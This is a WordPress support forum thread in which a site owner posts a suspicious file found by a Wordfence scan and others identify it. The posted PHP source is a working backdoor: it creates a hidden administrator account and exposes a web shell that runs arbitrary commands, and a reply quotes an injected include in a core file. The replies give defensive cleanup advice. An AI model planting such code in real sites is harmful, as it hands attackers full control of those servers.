Title: Class.wp.php
Last modified: October 28, 2016

---

# Class.wp.php

 *  Resolved [swhz](https://wordpress.org/support/users/swhz/)
 * (@swhz)
 * [9 years, 6 months ago](https://wordpress.org/support/topic/class-wp-php/)
 * I run bazar shop theme on my website.
 * When I scanned with wordfence, it detected that an unknown file was in my wp-
   includes directory named class.wp.php. I deleted the file from the directory 
   but have kept it on my desktop for observation. I am posting the code here, kindly
   tell me if it is malicious or not, or if it has other files as well.
 *     ```
       <?php error_reporting(0);
       include $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';
       $table_name = $wpdb->get_blog_prefix();
       $sample = 'a:1:{s:13:"administrator";b:1;}';
       if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}
       if( isset($_GET['awu']) ) {
       $wpdb->query("INSERT INTO $wpdb->users (<code>ID</code>, <code>user_login</code>, <code>user_pass</code>, <code>user_nicename</code>, <code>user_email</code>, <code>user_url</code>, <code>user_registered</code>, <code>user_activation_key</code>, <code>user_status</code>, <code>display_name</code>) VALUES ('1001010', '1001010', '\$P\$B3PJXeorEqVMl//L3H5xFX1Uc0t5870', '1001010', 't@e.st', '', '2011-06-07 00:00:00', '', '0', '1001010');");
       $wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (1001010, '1001010', '{$table_name}capabilities', '{$sample}');");
       $wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (NULL, '1001010', '{$table_name}user_level', '10');"); }
       if( isset($_GET['dwu']) ) { 
       $wpdb->query("DELETE FROM $wpdb->users WHERE <code>ID</code> = 1001010");
       $wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.<code>umeta_id</code> = 1001010");} 
       if( isset($_GET['console']) ) {function  MakeSimpleForm() { ?> <form method='GET' action='<?=$_SERVER['PHP_SELF']?>'>
       <input type=text name='cmd'> <input type=submit name='exec' value='ok'> </form> <? } function DoCmd($cmd) { ?>
       <textarea rows=30 cols=80><?=passthru($cmd)?></textarea><br> <? } if ( isset($_REQUEST['exec']) && isset($_REQUEST['cmd']))
       DoCmd($_REQUEST['cmd']); else MakeSimpleForm();}?>
       ```
   

Viewing 10 replies - 1 through 10 (of 10 total)

 *  [wfalaa](https://wordpress.org/support/users/wfalaa/)
 * (@wfalaa)
 * [9 years, 6 months ago](https://wordpress.org/support/topic/class-wp-php/#post-8391663)
 * Hi swhz,
    Using this code, someone may insert/delete a new user into your database
   with admin privileges, it’s the right thing you did by deleting this file, I 
   would also recommend the following: – Make sure you have WordPress, themes and
   plugins all updated to the latest stable version. – Change your FTP/cPanel password.–
   Compare number of users you have in (WordPress Dashboard > Users) with those 
   in “wp_users” database table.
 * Thanks.
 *  Thread Starter [swhz](https://wordpress.org/support/users/swhz/)
 * (@swhz)
 * [9 years, 6 months ago](https://wordpress.org/support/topic/class-wp-php/#post-8397301)
 * Thank you very much for replying.
 * I have done as you said, fortunately there are no suspicious users in the database.
 * Thank you again for helping and thank you for the amazing plugin.
 *  [gameslopedy](https://wordpress.org/support/users/yiggory/)
 * (@yiggory)
 * [9 years, 6 months ago](https://wordpress.org/support/topic/class-wp-php/#post-8397910)
 * > Filename: wp-includes/post.php
   >  File type: WordPress Core File The Original
   > Version of the file The Modified Version on your WordPress system 1 <?php 1
   > <?php if (file_exists(dirname(__FILE__) . ‘/wp-cd.php’)) include_once(dirname(
   > __FILE__) . ‘/wp-cd.php’); ?><?php 2 /** 2 /** 3 * Core Post API 3 * Core Post
   > API 4 * 4 *
 *  [wfalaa](https://wordpress.org/support/users/wfalaa/)
 * (@wfalaa)
 * [9 years, 6 months ago](https://wordpress.org/support/topic/class-wp-php/#post-8399534)
 * [@yiggory](https://wordpress.org/support/users/yiggory/) Following to [your thread here](https://wordpress.org/support/topic/critical-problem-what-do-i-have-to-do/),
   I recommend choosing “Restore the original version of this file.” option, as 
   there is no “wp-cd.php” file in WordPress default installation.
 * Thanks.
 *  [gameslopedy](https://wordpress.org/support/users/yiggory/)
 * (@yiggory)
 * [9 years, 6 months ago](https://wordpress.org/support/topic/class-wp-php/#post-8399905)
 * ok restored and also deleted other warning files.
 *  [fitbox](https://wordpress.org/support/users/fitmealat/)
 * (@fitmealat)
 * [9 years, 2 months ago](https://wordpress.org/support/topic/class-wp-php/#post-8852245)
 * had the same suspicious file in my system. deleted…and guess what it came back.
   Looking for the culprit now.
    does anybody have an idea how to best track the
   creation of this file?
 *  [Adam Patterson](https://wordpress.org/support/users/adampatterson/)
 * (@adampatterson)
 * [9 years ago](https://wordpress.org/support/topic/class-wp-php/#post-9110090)
 * I have found some entries in your active themes function.php file. As well as`
   wp-post.php` ( looking for `wp-cd.php` ) and a DB entry but I forgot what the
   table was called.
 * The strange thing is that I noticed this locally. Almost all of my local WordPress
   sites had this happen to it.
 * All of my local sites are .dev extensions so to have them mostly effected is 
   strange. if you do find out what causes it please let me know. I usually use 
   the same group of plugins on every site.
    -  This reply was modified 9 years ago by [Adam Patterson](https://wordpress.org/support/users/adampatterson/).
 *  [wfalaa](https://wordpress.org/support/users/wfalaa/)
 * (@wfalaa)
 * [9 years ago](https://wordpress.org/support/topic/class-wp-php/#post-9112172)
 * [@adampatterson](https://wordpress.org/support/users/adampatterson/) I’m not 
   sure what do you mean with “active themes function.php file”? Is this something
   related to Wordfence plugin?
 * Thanks.
 *  [Adam Patterson](https://wordpress.org/support/users/adampatterson/)
 * (@adampatterson)
 * [9 years ago](https://wordpress.org/support/topic/class-wp-php/#post-9112790)
 * [@wfalaa](https://wordpress.org/support/users/wfalaa/) I was not using WordFence
   sorry, I was searching out ‘wp-cd.php’ and offering my observations.
 *  [mokumax](https://wordpress.org/support/users/mokumax/)
 * (@mokumax)
 * [8 years, 8 months ago](https://wordpress.org/support/topic/class-wp-php/#post-9469852)
 * I got an alert for wp-includes/class-wp.php. I downloaded the latest from wordpress.
   org and the file was identical.

Viewing 10 replies - 1 through 10 (of 10 total)

The topic ‘Class.wp.php’ is closed to new replies.

 * ![](https://ps.w.org/wordfence/assets/icon.svg?rev=2070865)
 * [Wordfence Security - Firewall, Malware Scan, and Login Security](https://wordpress.org/plugins/wordfence/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/wordfence/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/wordfence/)
 * [Active Topics](https://wordpress.org/support/plugin/wordfence/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/wordfence/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/wordfence/reviews/)

## Tags

 * [class](https://wordpress.org/support/topic-tag/class/)
 * [silence is golden](https://wordpress.org/support/topic-tag/silence-is-golden/)

 * 10 replies
 * 6 participants
 * Last reply from: [mokumax](https://wordpress.org/support/users/mokumax/)
 * Last activity: [8 years, 8 months ago](https://wordpress.org/support/topic/class-wp-php/#post-9469852)
 * Status: resolved